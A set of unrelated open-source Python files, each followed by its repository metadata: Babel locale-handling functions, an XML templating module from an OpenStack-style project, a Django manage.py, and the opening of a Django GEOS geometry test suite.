"""Locale patterns for interval formatting.
.. note:: The format of the value returned may change between
Babel versions.
How to format date intervals in Finnish when the day is the
smallest changing component:
>>> Locale('fi_FI').interval_formats['MEd']['d']
[u'E d. \u2013 ', u'E d.M.']
.. seealso::
The primary API to use this data is :py:func:`babel.dates.format_interval`.
:rtype: dict[str, dict[str, list[str]]]
"""
return self._data['interval_formats']
@property
def plural_form(self):
"""Plural rules for the locale.
>>> Locale('en').plural_form(1)
'one'
>>> Locale('en').plural_form(0)
'other'
>>> Locale('fr').plural_form(0)
'one'
>>> Locale('ru').plural_form(100)
'many'
"""
return self._data.get('plural_form', _default_plural_rule)
@property
def list_patterns(self):
"""Patterns for generating lists
.. note:: The format of the value returned may change between
Babel versions.
>>> Locale('en').list_patterns['start']
u'{0}, {1}'
>>> Locale('en').list_patterns['end']
u'{0}, and {1}'
>>> Locale('en_GB').list_patterns['end']
u'{0} and {1}'
"""
return self._data['list_patterns']
@property
def ordinal_form(self):
"""Plural rules for the locale.
>>> Locale('en').ordinal_form(1)
'one'
>>> Locale('en').ordinal_form(2)
'two'
>>> Locale('en').ordinal_form(3)
'few'
>>> Locale('fr').ordinal_form(2)
'other'
>>> Locale('ru').ordinal_form(100)
'other'
"""
return self._data.get('ordinal_form', _default_plural_rule)
@property
def measurement_systems(self):
"""Localized names for various measurement systems.
>>> Locale('fr', 'FR').measurement_systems['US']
u'am\\xe9ricain'
>>> Locale('en', 'US').measurement_systems['US']
u'US'
"""
return self._data['measurement_systems']
@property
def character_order(self):
"""The text direction for the language.
>>> Locale('de', 'DE').character_order
'left-to-right'
>>> Locale('ar', 'SA').character_order
'right-to-left'
"""
return self._data['character_order']
@property
def text_direction(self):
"""The text direction for the language in CSS short-hand form.
>>> Locale('de', 'DE').text_direction
'ltr'
>>> Locale('ar', 'SA').text_direction
'rtl'
"""
return ''.join(word[0] for word in self.character_order.split('-'))
@property
def unit_display_names(self):
"""Display names for units of measurement.
.. seealso::
You may want to use :py:func:`babel.units.get_unit_name` instead.
.. note:: The format of the value returned may change between
Babel versions.
"""
return self._data['unit_display_names']
def default_locale(category=None, aliases=LOCALE_ALIASES):
"""Returns the system default locale for a given category, based on
environment variables.
>>> for name in ['LANGUAGE', 'LC_ALL', 'LC_CTYPE']:
... os.environ[name] = ''
>>> os.environ['LANG'] = 'fr_FR.UTF-8'
>>> default_locale('LC_MESSAGES')
'fr_FR'
The "C" or "POSIX" pseudo-locales are treated as aliases for the
"en_US_POSIX" locale:
>>> os.environ['LC_MESSAGES'] = 'POSIX'
>>> default_locale('LC_MESSAGES')
'en_US_POSIX'
The following fallbacks to the variable are always considered:
- ``LANGUAGE``
- ``LC_ALL``
- ``LC_CTYPE``
- ``LANG``
:param category: one of the ``LC_XXX`` environment variable names
:param aliases: a dictionary of aliases for locale identifiers
"""
varnames = (category, 'LANGUAGE', 'LC_ALL', 'LC_CTYPE', 'LANG')
for name in filter(None, varnames):
locale = os.getenv(name)
if locale:
if name == 'LANGUAGE' and ':' in locale:
# the LANGUAGE variable may contain a colon-separated list of
# language codes; we just pick the language on the list
locale = locale.split(':')[0]
if locale.split('.')[0] in ('C', 'POSIX'):
locale = 'en_US_POSIX'
elif aliases and locale in aliases:
locale = aliases[locale]
try:
return get_locale_identifier(parse_locale(locale))
except ValueError:
pass
def negotiate_locale(preferred, available, sep='_', aliases=LOCALE_ALIASES):
"""Find the best match between available and requested locale strings.
>>> negotiate_locale(['de_DE', 'en_US'], ['de_DE', 'de_AT'])
'de_DE'
>>> negotiate_locale(['de_DE', 'en_US'], ['en', 'de'])
'de'
Case is ignored by the algorithm, the result uses the case of the preferred
locale identifier:
>>> negotiate_locale(['de_DE', 'en_US'], ['de_de', 'de_at'])
'de_DE'
>>> negotiate_locale(['de_DE', 'en_US'], ['de_de', 'de_at'])
'de_DE'
By default, some web browsers unfortunately do not include the territory
in the locale identifier for many locales, and some don't even allow the
user to easily add the territory. So while you may prefer using qualified
locale identifiers in your web-application, they would not normally match
the language-only locale sent by such browsers. To workaround that, this
function uses a default mapping of commonly used langauge-only locale
identifiers to identifiers including the territory:
>>> negotiate_locale(['ja', 'en_US'], ['ja_JP', 'en_US'])
'ja_JP'
Some browsers even use an incorrect or outdated language code, such as "no"
for Norwegian, where the correct locale identifier would actually be "nb_NO"
(Bokmål) or "nn_NO" (Nynorsk). The aliases are intended to take care of
such cases, too:
>>> negotiate_locale(['no', 'sv'], ['nb_NO', 'sv_SE'])
'nb_NO'
You can override this default mapping by passing a different `aliases`
dictionary to this function, or you can bypass the behavior althogher by
setting the `aliases` parameter to `None`.
:param preferred: the list of locale strings preferred by the user
:param available: the list of locale strings available
:param sep: character that separates the different parts of the locale
strings
:param aliases: a dictionary of aliases for locale identifiers
"""
available = [a.lower() for a in available if a]
for locale in preferred:
ll = locale.lower()
if ll in available:
return locale
if aliases:
alias = aliases.get(ll)
if alias:
alias = alias.replace('_', sep)
if alias.lower() in available:
return alias
parts = locale.split(sep)
if len(parts) > 1 and parts[0].lower() in available:
return parts[0]
return None
def parse_locale(identifier, sep='_'):
"""Parse a locale identifier into a tuple of the form ``(language,
territory, script, variant)``.
>>> parse_locale('zh_CN')
('zh', 'CN', None, None)
>>> parse_locale('zh_Hans_CN')
('zh', 'CN', 'Hans', None)
The default component separator is "_", but a different separator can be
specified using the `sep` parameter:
>>> parse_locale('zh-CN', sep='-')
('zh', 'CN', None, None)
If the identifier cannot be parsed into a locale, a `ValueError` exception
is raised:
>>> parse_locale('not_a_LOCALE_String')
Traceback (most recent call last):
...
ValueError: 'not_a_LOCALE_String' is not a valid locale identifier
Encoding information and locale modifiers are removed from the identifier:
>>> parse_locale('it_IT@euro')
('it', 'IT', None, None)
>>> parse_locale('en_US.UTF-8')
('en', 'US', None, None)
>>> parse_locale('de_DE.iso885915@euro')
('de', 'DE', None, None)
See :rfc:`4646` for more information.
:param identifier: the locale identifier string
:param sep: character that separates the different components of the locale
identifier
:raise `ValueError`: if the string does not appear to be a valid locale
identifier
"""
if '.' in identifier:
# this is probably the charset/encoding, which we don't care about
identifier = identifier.split('.', 1)[0]
if '@' in identifier:
# this is a locale modifier such as @euro, which we don't care about
# either
identifier = identifier.split('@', 1)[0]
parts = identifier.split(sep)
lang = parts.pop(0).lower()
if not lang.isalpha():
raise ValueError('expected only letters, got %r' % lang)
script = territory = variant = None
if parts:
if len(parts[0]) == 4 and parts[0].isalpha():
script = parts.pop(0).title()
if parts:
if len(parts[0]) == 2 and parts[0].isalpha():
territory = parts.pop(0).upper()
elif len(parts[0]) == 3 and parts[0].isdigit():
territory = parts.pop(0)
if parts:
if len(parts[0]) == 4 and parts[0][0].isdigit() or \
len(parts[0]) >= 5 and parts[0][0].isalpha():
variant = parts.pop()
if parts:
raise ValueError('%r is not a valid locale identifier' % identifier)
return lang, territory, script, variant
def get_locale_identifier(tup, sep='_'):
"""The reverse of :func:`parse_locale`. It creates a locale identifier out
of a ``(language, territory, script, variant)`` tuple. Items can be set to
``None`` and trailing ``None``\s can also be left out of the tuple.
>>> get_locale_identifier(('de', 'DE', None, '1999'))
'de_DE_1999'
.. versionadded:: 1.0
:param tup: the tuple as returned by :func:`parse_locale`.
:param sep: the separator for the identifier.
"""
tup = tuple(tup[:4])
lang, territory, script, variant = tup + (None,) * (4 - len(tup))
return sep.join(filter(None, (lang, script, territory, variant)))
| {
"content_hash": "20a676f4d97d8f92953ec505904bbb3c",
"timestamp": "",
"source": "github",
"line_count": 1131,
"max_line_length": 86,
"avg_line_length": 32.5393457117595,
"alnum_prop": 0.569751643932395,
"repo_name": "vicky2135/lucious",
"id": "bb59b7413f8365c889528d1074c85af06b88820f",
"size": "36827",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "oscar/lib/python2.7/site-packages/babel/core.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "896683"
},
{
"name": "C++",
"bytes": "52230"
},
{
"name": "CSS",
"bytes": "1169533"
},
{
"name": "HTML",
"bytes": "1104983"
},
{
"name": "JavaScript",
"bytes": "1055140"
},
{
"name": "Makefile",
"bytes": "145238"
},
{
"name": "Python",
"bytes": "55993261"
},
{
"name": "Shell",
"bytes": "40487"
}
],
"symlink_target": ""
} |
import os.path
import re
from lxml import etree
import six
from conveyor.i18n import _
from conveyor import utils
XMLNS_V10 = 'http://docs.rackspacecloud.com/servers/api/v1.0'
XMLNS_V11 = 'http://docs.openstack.org/compute/api/v1.1'
XMLNS_COMMON_V10 = 'http://docs.openstack.org/common/api/v1.0'
XMLNS_ATOM = 'http://www.w3.org/2005/Atom'
XMLNS_VOLUME_V1 = ('http://docs.openstack.org/api/openstack-block-storage/1.0/'
'content')
XMLNS_VOLUME_V2 = ('http://docs.openstack.org/api/openstack-block-storage/2.0/'
'content')
_split_pattern = re.compile(r'([^:{]*{[^}]*}[^:]*|[^:]+)')
def validate_schema(xml, schema_name):
if isinstance(xml, str):
xml = etree.fromstring(xml)
base_path = 'conveyor/api/schemas/v1.1/'
if schema_name in ('atom', 'atom-link'):
base_path = 'conveyor/api/schemas/'
schema_path = os.path.join(utils.cinderdir(),
'%s%s.rng' % (base_path, schema_name))
schema_doc = etree.parse(schema_path)
relaxng = etree.RelaxNG(schema_doc)
relaxng.assertValid(xml)
class Selector(object):
"""Selects datum to operate on from an object."""
def __init__(self, *chain):
"""Initialize the selector.
Each argument is a subsequent index into the object.
"""
self.chain = chain
def __repr__(self):
"""Return a representation of the selector."""
return "Selector" + repr(self.chain)
def __call__(self, obj, do_raise=False):
"""Select a datum to operate on.
Selects the relevant datum within the object.
:param obj: The object from which to select the object.
:param do_raise: If False (the default), return None if the
indexed datum does not exist. Otherwise,
raise a KeyError.
"""
# Walk the selector list
for elem in self.chain:
# If it's callable, call it
if callable(elem):
obj = elem(obj)
else:
# Use indexing
try:
obj = obj[elem]
except (KeyError, IndexError):
# No sense going any further
if do_raise:
# Convert to a KeyError, for consistency
raise KeyError(elem)
return None
# Return the finally-selected object
return obj
def get_items(obj):
"""Get items in obj."""
return list(obj.items())
class EmptyStringSelector(Selector):
"""Returns the empty string if Selector would return None."""
def __call__(self, obj, do_raise=False):
"""Returns empty string if the selected value does not exist."""
try:
return super(EmptyStringSelector, self).__call__(obj, True)
except KeyError:
return ""
class ConstantSelector(object):
"""Returns a constant."""
def __init__(self, value):
"""Initialize the selector.
:param value: The value to return.
"""
self.value = value
def __repr__(self):
"""Return a representation of the selector."""
return repr(self.value)
def __call__(self, _obj, _do_raise=False):
"""Select a datum to operate on.
Returns a constant value. Compatible with
Selector.__call__().
"""
return self.value
class TemplateElement(object):
"""Represent an element in the template."""
def __init__(self, tag, attrib=None, selector=None, subselector=None,
**extra):
"""Initialize an element.
Initializes an element in the template. Keyword arguments
specify attributes to be set on the element; values must be
callables. See TemplateElement.set() for more information.
:param tag: The name of the tag to create.
:param attrib: An optional dictionary of element attributes.
:param selector: An optional callable taking an object and
optional boolean do_raise indicator and
returning the object bound to the element.
:param subselector: An optional callable taking an object and
optional boolean do_raise indicator and
returning the object bound to the element.
This is used to further refine the datum
object returned by selector in the event
that it is a list of objects.
"""
# Convert selector into a Selector
if selector is None:
selector = Selector()
elif not callable(selector):
selector = Selector(selector)
# Convert subselector into a Selector
if subselector is not None and not callable(subselector):
subselector = Selector(subselector)
self.tag = tag
self.selector = selector
self.subselector = subselector
self.attrib = {}
self._text = None
self._children = []
self._childmap = {}
# Run the incoming attributes through set() so that they
# become selectorized
if not attrib:
attrib = {}
attrib.update(extra)
for k, v in attrib.items():
self.set(k, v)
def __repr__(self):
"""Return a representation of the template element."""
return ('<%s.%s %r at %#x>' %
(self.__class__.__module__, self.__class__.__name__,
self.tag, id(self)))
def __len__(self):
"""Return the number of child elements."""
return len(self._children)
def __contains__(self, key):
"""Determine whether a child node named by key exists."""
return key in self._childmap
def __getitem__(self, idx):
"""Retrieve a child node by index or name."""
if isinstance(idx, basestring):
# Allow access by node name
return self._childmap[idx]
else:
return self._children[idx]
def append(self, elem):
"""Append a child to the element."""
# Unwrap templates...
elem = elem.unwrap()
# Avoid duplications
if elem.tag in self._childmap:
raise KeyError(elem.tag)
self._children.append(elem)
self._childmap[elem.tag] = elem
def extend(self, elems):
"""Append children to the element."""
# Pre-evaluate the elements
elemmap = {}
elemlist = []
for elem in elems:
# Unwrap templates...
elem = elem.unwrap()
# Avoid duplications
if elem.tag in self._childmap or elem.tag in elemmap:
raise KeyError(elem.tag)
elemmap[elem.tag] = elem
elemlist.append(elem)
# Update the children
self._children.extend(elemlist)
self._childmap.update(elemmap)
def insert(self, idx, elem):
"""Insert a child element at the given index."""
# Unwrap templates...
elem = elem.unwrap()
# Avoid duplications
if elem.tag in self._childmap:
raise KeyError(elem.tag)
self._children.insert(idx, elem)
self._childmap[elem.tag] = elem
def remove(self, elem):
"""Remove a child element."""
# Unwrap templates...
elem = elem.unwrap()
# Check if element exists
if elem.tag not in self._childmap or self._childmap[elem.tag] != elem:
raise ValueError(_('element is not a child'))
self._children.remove(elem)
del self._childmap[elem.tag]
def get(self, key):
"""Get an attribute.
Returns a callable which performs datum selection.
:param key: The name of the attribute to get.
"""
return self.attrib[key]
def set(self, key, value=None):
"""Set an attribute.
:param key: The name of the attribute to set.
:param value: A callable taking an object and optional boolean
do_raise indicator and returning the datum bound
to the attribute. If None, a Selector() will be
constructed from the key. If a string, a
Selector() will be constructed from the string.
"""
# Convert value to a selector
if value is None:
value = Selector(key)
elif not callable(value):
value = Selector(value)
self.attrib[key] = value
def keys(self):
"""Return the attribute names."""
return self.attrib.keys()
def items(self):
"""Return the attribute names and values."""
return self.attrib.items()
def unwrap(self):
"""Unwraps a template to return a template element."""
# We are a template element
return self
def wrap(self):
"""Wraps a template element to return a template."""
# Wrap in a basic Template
return Template(self)
def apply(self, elem, obj):
"""Apply text and attributes to an etree.Element.
Applies the text and attribute instructions in the template
element to an etree.Element instance.
:param elem: An etree.Element instance.
:param obj: The base object associated with this template
element.
"""
# Start with the text...
if self.text is not None:
elem.text = six.text_type(self.text(obj))
# Now set up all the attributes...
for key, value in self.attrib.items():
try:
elem.set(key, six.text_type(value(obj, True)))
except KeyError:
# Attribute has no value, so don't include it
pass
def getAttrib(self, obj):
"""Get attribute."""
tmpattrib = {}
# Now set up all the attributes...
for key, value in self.attrib.items():
try:
tmpattrib[key] = value(obj)
except KeyError:
# Attribute has no value, so don't include it
pass
return tmpattrib
@staticmethod
def _splitTagName(name):
return _split_pattern.findall(name)
def _render(self, parent, datum, patches, nsmap):
"""Internal rendering.
Renders the template node into an etree.Element object.
Returns the etree.Element object.
:param parent: The parent etree.Element instance.
:param datum: The datum associated with this template element.
:param patches: A list of other template elements that must
also be applied.
:param nsmap: An optional namespace dictionary to be
associated with the etree.Element instance.
"""
# Allocate a node
if callable(self.tag):
tagname = self.tag(datum)
else:
tagname = self.tag
# If the datum is None
if datum is not None:
tmpattrib = self.getAttrib(datum)
else:
tmpattrib = {}
tagnameList = self._splitTagName(tagname)
insertIndex = 0
# If parent is not none and has same tagname
if parent is not None:
for i in range(0, len(tagnameList)):
tmpInsertPos = parent.find(tagnameList[i])
if tmpInsertPos is None:
break
elif not cmp(parent.attrib, tmpattrib) == 0:
break
parent = tmpInsertPos
insertIndex = i + 1
if insertIndex >= len(tagnameList):
insertIndex = insertIndex - 1
# Create root elem
elem = etree.Element(tagnameList[insertIndex], nsmap=nsmap)
rootelem = elem
subelem = elem
# Create subelem
for i in range((insertIndex + 1), len(tagnameList)):
subelem = etree.SubElement(elem, tagnameList[i])
elem = subelem
# If we have a parent, append the node to the parent
if parent is not None:
# If we can merge this element, then insert
if insertIndex > 0:
parent.insert(len(list(parent)), rootelem)
else:
parent.append(rootelem)
# If the datum is None, do nothing else
if datum is None:
return rootelem
# Apply this template element to the element
self.apply(subelem, datum)
# Additionally, apply the patches
for patch in patches:
patch.apply(subelem, datum)
# We have fully rendered the element; return it
return rootelem
def render(self, parent, obj, patches=None, nsmap=None):
"""Render an object.
Renders an object against this template node. Returns a list
of two-item tuples, where the first item is an etree.Element
instance and the second item is the datum associated with that
instance.
:param parent: The parent for the etree.Element instances.
:param obj: The object to render this template element
against.
:param patches: A list of other template elements to apply
when rendering this template element.
:param nsmap: An optional namespace dictionary to attach to
the etree.Element instances.
"""
patches = patches or []
# First, get the datum we're rendering
data = None if obj is None else self.selector(obj)
# Check if we should render at all
if not self.will_render(data):
return []
elif data is None:
return [(self._render(parent, None, patches, nsmap), None)]
# Make the data into a list if it isn't already
if not isinstance(data, list):
data = [data]
elif parent is None:
raise ValueError(_('root element selecting a list'))
# Render all the elements
elems = []
for datum in data:
if self.subselector is not None:
datum = self.subselector(datum)
elems.append((self._render(parent, datum, patches, nsmap), datum))
# Return all the elements rendered, as well as the
# corresponding datum for the next step down the tree
return elems
def will_render(self, datum):
"""Hook method.
An overridable hook method to determine whether this template
element will be rendered at all. By default, returns False
(inhibiting rendering) if the datum is None.
:param datum: The datum associated with this template element.
"""
# Don't render if datum is None
return datum is not None
def _text_get(self):
"""Template element text.
Either None or a callable taking an object and optional
boolean do_raise indicator and returning the datum bound to
the text of the template element.
"""
return self._text
def _text_set(self, value):
# Convert value to a selector
if value is not None and not callable(value):
value = Selector(value)
self._text = value
def _text_del(self):
self._text = None
text = property(_text_get, _text_set, _text_del)
def tree(self):
"""Return string representation of the template tree.
Returns a representation of the template rooted at this
element as a string, suitable for inclusion in debug logs.
"""
# Build the inner contents of the tag...
contents = [self.tag, '!selector=%r' % self.selector]
# Add the text...
if self.text is not None:
contents.append('!text=%r' % self.text)
# Add all the other attributes
for key, value in self.attrib.items():
contents.append('%s=%r' % (key, value))
# If there are no children, return it as a closed tag
if len(self) == 0:
return '<%s/>' % ' '.join([str(i) for i in contents])
# OK, recurse to our children
children = [c.tree() for c in self]
# Return the result
return ('<%s>%s</%s>' %
(' '.join(contents), ''.join(children), self.tag))
def SubTemplateElement(parent, tag, attrib=None, selector=None,
subselector=None, **extra):
"""Create a template element as a child of another.
Corresponds to the etree.SubElement interface. Parameters are as
for TemplateElement, with the addition of the parent.
"""
# Convert attributes
attrib = attrib or {}
attrib.update(extra)
# Get a TemplateElement
elem = TemplateElement(tag, attrib=attrib, selector=selector,
subselector=subselector)
# Append the parent safely
if parent is not None:
parent.append(elem)
return elem
class Template(object):
"""Represent a template."""
def __init__(self, root, nsmap=None):
"""Initialize a template.
:param root: The root element of the template.
:param nsmap: An optional namespace dictionary to be
associated with the root element of the
template.
"""
self.root = root.unwrap() if root is not None else None
self.nsmap = nsmap or {}
self.serialize_options = dict(encoding='UTF-8', xml_declaration=True)
def _serialize(self, parent, obj, siblings, nsmap=None):
"""Internal serialization.
Recursive routine to build a tree of etree.Element instances
from an object based on the template. Returns the first
etree.Element instance rendered, or None.
:param parent: The parent etree.Element instance. Can be
None.
:param obj: The object to render.
:param siblings: The TemplateElement instances against which
to render the object.
:param nsmap: An optional namespace dictionary to be
associated with the etree.Element instance
rendered.
"""
# First step, render the element
elems = siblings[0].render(parent, obj, siblings[1:], nsmap)
# Now, traverse all child elements
seen = set()
for idx, sibling in enumerate(siblings):
for child in sibling:
# Have we handled this child already?
if child.tag in seen:
continue
seen.add(child.tag)
# Determine the child's siblings
nieces = [child]
for sib in siblings[idx + 1:]:
if child.tag in sib:
nieces.append(sib[child.tag])
# Now call this function for all data elements recursively
for elem, datum in elems:
self._serialize(elem, datum, nieces)
# Return the first element; at the top level, this will be the
# root element
if elems:
return elems[0][0]
def serialize(self, obj, *args, **kwargs):
"""Serialize an object.
Serializes an object against the template. Returns a string
with the serialized XML. Positional and keyword arguments are
passed to etree.tostring().
:param obj: The object to serialize.
"""
elem = self.make_tree(obj)
if elem is None:
return ''
for k, v in self.serialize_options.items():
kwargs.setdefault(k, v)
# Serialize it into XML
return etree.tostring(elem, *args, **kwargs)
def make_tree(self, obj):
"""Create a tree.
Serializes an object against the template. Returns an Element
node with appropriate children.
:param obj: The object to serialize.
"""
# If the template is empty, return the empty string
if self.root is None:
return None
# Get the siblings and nsmap of the root element
siblings = self._siblings()
nsmap = self._nsmap()
# Form the element tree
return self._serialize(None, obj, siblings, nsmap)
def _siblings(self):
"""Hook method for computing root siblings.
An overridable hook method to return the siblings of the root
element. By default, this is the root element itself.
"""
return [self.root]
def _nsmap(self):
"""Hook method for computing the namespace dictionary.
An overridable hook method to return the namespace dictionary.
"""
return self.nsmap.copy()
def unwrap(self):
"""Unwraps a template to return a template element."""
# Return the root element
return self.root
def wrap(self):
"""Wraps a template element to return a template."""
# We are a template
return self
def apply(self, master):
"""Hook method for determining slave applicability.
An overridable hook method used to determine if this template
is applicable as a slave to a given master template.
:param master: The master template to test.
"""
return True
def tree(self):
"""Return string representation of the template tree.
Returns a representation of the template as a string, suitable
for inclusion in debug logs.
"""
return "%r: %s" % (self, self.root.tree())
class MasterTemplate(Template):
"""Represent a master template.
Master templates are versioned derivatives of templates that
additionally allow slave templates to be attached. Slave
templates allow modification of the serialized result without
directly changing the master.
"""
def __init__(self, root, version, nsmap=None):
"""Initialize a master template.
:param root: The root element of the template.
:param version: The version number of the template.
:param nsmap: An optional namespace dictionary to be
associated with the root element of the
template.
"""
super(MasterTemplate, self).__init__(root, nsmap)
self.version = version
self.slaves = []
def __repr__(self):
"""Return string representation of the template."""
return ("<%s.%s object version %s at %#x>" %
(self.__class__.__module__, self.__class__.__name__,
self.version, id(self)))
def _siblings(self):
"""Hook method for computing root siblings.
An overridable hook method to return the siblings of the root
element. This is the root element plus the root elements of
all the slave templates.
"""
return [self.root] + [slave.root for slave in self.slaves]
def _nsmap(self):
"""Hook method for computing the namespace dictionary.
An overridable hook method to return the namespace dictionary.
The namespace dictionary is computed by taking the master
template's namespace dictionary and updating it from all the
slave templates.
"""
nsmap = self.nsmap.copy()
for slave in self.slaves:
nsmap.update(slave._nsmap())
return nsmap
def attach(self, *slaves):
"""Attach one or more slave templates.
Attaches one or more slave templates to the master template.
Slave templates must have a root element with the same tag as
the master template. The slave template's apply() method will
be called to determine if the slave should be applied to this
master; if it returns False, that slave will be skipped.
(This allows filtering of slaves based on the version of the
master template.)
"""
slave_list = []
for slave in slaves:
slave = slave.wrap()
# Make sure we have a tree match
if slave.root.tag != self.root.tag:
msg = (_("Template tree mismatch; adding slave %(slavetag)s "
"to master %(mastertag)s") %
{'slavetag': slave.root.tag,
'mastertag': self.root.tag})
raise ValueError(msg)
# Make sure slave applies to this template
if not slave.apply(self):
continue
slave_list.append(slave)
# Add the slaves
self.slaves.extend(slave_list)
def copy(self):
"""Return a copy of this master template."""
# Return a copy of the MasterTemplate
tmp = self.__class__(self.root, self.version, self.nsmap)
tmp.slaves = self.slaves[:]
return tmp
class SlaveTemplate(Template):
"""Represent a slave template.
Slave templates are versioned derivatives of templates. Each
slave has a minimum version and optional maximum version of the
master template to which they can be attached.
"""
def __init__(self, root, min_vers, max_vers=None, nsmap=None):
"""Initialize a slave template.
:param root: The root element of the template.
:param min_vers: The minimum permissible version of the master
template for this slave template to apply.
:param max_vers: An optional upper bound for the master
template version.
:param nsmap: An optional namespace dictionary to be
associated with the root element of the
template.
"""
super(SlaveTemplate, self).__init__(root, nsmap)
self.min_vers = min_vers
self.max_vers = max_vers
def __repr__(self):
"""Return string representation of the template."""
return ("<%s.%s object versions %s-%s at %#x>" %
(self.__class__.__module__, self.__class__.__name__,
self.min_vers, self.max_vers, id(self)))
def apply(self, master):
"""Hook method for determining slave applicability.
An overridable hook method used to determine if this template
is applicable as a slave to a given master template. This
version requires the master template to have a version number
between min_vers and max_vers.
:param master: The master template to test.
"""
# Does the master meet our minimum version requirement?
if master.version < self.min_vers:
return False
# How about our maximum version requirement?
if self.max_vers is not None and master.version > self.max_vers:
return False
return True
class TemplateBuilder(object):
"""Template builder.
This class exists to allow templates to be lazily built without
having to build them each time they are needed. It must be
subclassed, and the subclass must implement the construct()
method, which must return a Template (or subclass) instance. The
constructor will always return the template returned by
construct(), or, if it has a copy() method, a copy of that
template.
"""
_tmpl = None
def __new__(cls, copy=True):
"""Construct and return a template.
:param copy: If True (the default), a copy of the template
will be constructed and returned, if possible.
"""
# Do we need to construct the template?
if cls._tmpl is None:
tmp = super(TemplateBuilder, cls).__new__(cls)
# Construct the template
cls._tmpl = tmp.construct()
# If the template has a copy attribute, return the result of
# calling it
if copy and hasattr(cls._tmpl, 'copy'):
return cls._tmpl.copy()
# Return the template
return cls._tmpl
def construct(self):
"""Construct a template.
Called to construct a template instance, which it must return.
Only called once.
"""
raise NotImplementedError(_("subclasses must implement construct()!"))
def make_links(parent, selector=None):
"""Attach an Atom <links> element to the parent."""
elem = SubTemplateElement(parent, '{%s}link' % XMLNS_ATOM,
selector=selector)
elem.set('rel')
elem.set('type')
elem.set('href')
# Just for completeness...
return elem
def make_flat_dict(name, selector=None, subselector=None, ns=None):
"""Utility for simple XML templates.
Simple templates are templates that traditionally used
XMLDictSerializer with no metadata.
Returns a template element where the top-level element has the
given tag name, and where sub-elements have tag names derived
from the object's keys and text derived from the object's values.
This only works for flat dictionary objects, not dictionaries
containing nested lists or dictionaries.
"""
# Set up the names we need...
if ns is None:
elemname = name
tagname = Selector(0)
else:
elemname = '{%s}%s' % (ns, name)
tagname = lambda obj, do_raise=False: '{%s}%s' % (ns, obj[0])
if selector is None:
selector = name
# Build the root element
root = TemplateElement(elemname, selector=selector,
subselector=subselector)
# Build an element to represent all the keys and values
elem = SubTemplateElement(root, tagname, selector=get_items)
elem.text = 1
# Return the template
return root
| {
"content_hash": "e8723b4dbc2fba0612091f0b78f54800",
"timestamp": "",
"source": "github",
"line_count": 953,
"max_line_length": 79,
"avg_line_length": 31.28436516264428,
"alnum_prop": 0.5822767827195278,
"repo_name": "Hybrid-Cloud/conveyor",
"id": "86df072e0e889158ed41230c968a79fbc29bfd32",
"size": "30450",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "conveyor/api/xmlutil.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3789174"
},
{
"name": "Shell",
"bytes": "16567"
}
],
"symlink_target": ""
} |
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "spades.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| {
"content_hash": "235229d399c3ecc399366558a4ebee5f",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 70,
"avg_line_length": 25.22222222222222,
"alnum_prop": 0.7092511013215859,
"repo_name": "foxbenjaminfox/deckofcards",
"id": "b8a2fbaccb92042f437bc5ac4c0304e2ef87ab6b",
"size": "249",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "manage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "49349"
},
{
"name": "HTML",
"bytes": "12020"
},
{
"name": "JavaScript",
"bytes": "75173"
},
{
"name": "Python",
"bytes": "24548"
}
],
"symlink_target": ""
} |
import ctypes
import itertools
import json
import pickle
import random
from binascii import a2b_hex
from io import BytesIO
from unittest import mock, skipIf
from django.contrib.gis import gdal
from django.contrib.gis.geos import (
GeometryCollection, GEOSException, GEOSGeometry, LinearRing, LineString,
MultiLineString, MultiPoint, MultiPolygon, Point, Polygon, fromfile,
fromstr,
)
from django.contrib.gis.geos.libgeos import geos_version_tuple
from django.contrib.gis.shortcuts import numpy
from django.template import Context
from django.template.engine import Engine
from django.test import SimpleTestCase
from ..test_data import TestDataMixin
class GEOSTest(SimpleTestCase, TestDataMixin):
def test_wkt(self):
"Testing WKT output."
for g in self.geometries.wkt_out:
geom = fromstr(g.wkt)
if geom.hasz:
self.assertEqual(g.ewkt, geom.wkt)
def test_hex(self):
"Testing HEX output."
for g in self.geometries.hex_wkt:
geom = fromstr(g.wkt)
self.assertEqual(g.hex, geom.hex.decode())
def test_hexewkb(self):
"Testing (HEX)EWKB output."
# For testing HEX(EWKB).
ogc_hex = b'01010000000000000000000000000000000000F03F'
ogc_hex_3d = b'01010000800000000000000000000000000000F03F0000000000000040'
# `SELECT ST_AsHEXEWKB(ST_GeomFromText('POINT(0 1)', 4326));`
hexewkb_2d = b'0101000020E61000000000000000000000000000000000F03F'
# `SELECT ST_AsHEXEWKB(ST_GeomFromEWKT('SRID=4326;POINT(0 1 2)'));`
hexewkb_3d = b'01010000A0E61000000000000000000000000000000000F03F0000000000000040'
pnt_2d = Point(0, 1, srid=4326)
pnt_3d = Point(0, 1, 2, srid=4326)
# OGC-compliant HEX will not have SRID value.
self.assertEqual(ogc_hex, pnt_2d.hex)
self.assertEqual(ogc_hex_3d, pnt_3d.hex)
# HEXEWKB should be appropriate for its dimension -- have to use an
# a WKBWriter w/dimension set accordingly, else GEOS will insert
# garbage into 3D coordinate if there is none.
self.assertEqual(hexewkb_2d, pnt_2d.hexewkb)
self.assertEqual(hexewkb_3d, pnt_3d.hexewkb)
self.assertIs(GEOSGeometry(hexewkb_3d).hasz, True)
# Same for EWKB.
self.assertEqual(memoryview(a2b_hex(hexewkb_2d)), pnt_2d.ewkb)
self.assertEqual(memoryview(a2b_hex(hexewkb_3d)), pnt_3d.ewkb)
# Redundant sanity check.
self.assertEqual(4326, GEOSGeometry(hexewkb_2d).srid)
def test_kml(self):
"Testing KML output."
for tg in self.geometries.wkt_out:
geom = fromstr(tg.wkt)
kml = getattr(tg, 'kml', False)
if kml:
self.assertEqual(kml, geom.kml)
def test_errors(self):
"Testing the Error handlers."
# string-based
for err in self.geometries.errors:
with self.assertRaises((GEOSException, ValueError)):
fromstr(err.wkt)
# Bad WKB
with self.assertRaises(GEOSException):
GEOSGeometry(memoryview(b'0'))
class NotAGeometry:
pass
# Some other object
with self.assertRaises(TypeError):
GEOSGeometry(NotAGeometry())
# None
